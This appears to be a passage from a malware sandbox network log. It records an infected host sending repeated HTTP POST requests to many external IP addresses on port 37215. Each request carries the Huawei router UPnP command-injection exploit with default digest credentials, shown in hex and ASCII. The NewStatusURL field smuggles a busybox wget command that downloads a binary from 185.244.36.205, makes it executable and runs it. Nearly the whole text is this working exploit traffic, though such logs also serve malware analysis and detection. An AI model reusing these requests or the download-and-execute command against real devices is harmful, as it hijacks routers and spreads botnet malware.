                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              765192.168.2.1537682197.203.227.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227262020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              766192.168.2.1541512190.137.237.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227262974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              767192.168.2.153644431.48.54.10837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227262974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              768192.168.2.1545204157.67.185.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227313042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              769192.168.2.1535528121.88.214.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227349997 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              770192.168.2.153862695.143.27.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227351904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              771192.168.2.153413631.71.65.15837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227353096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              772192.168.2.154384045.24.223.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227376938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              773192.168.2.1559558121.145.192.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227421999 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              774192.168.2.1533524156.229.108.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227422953 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
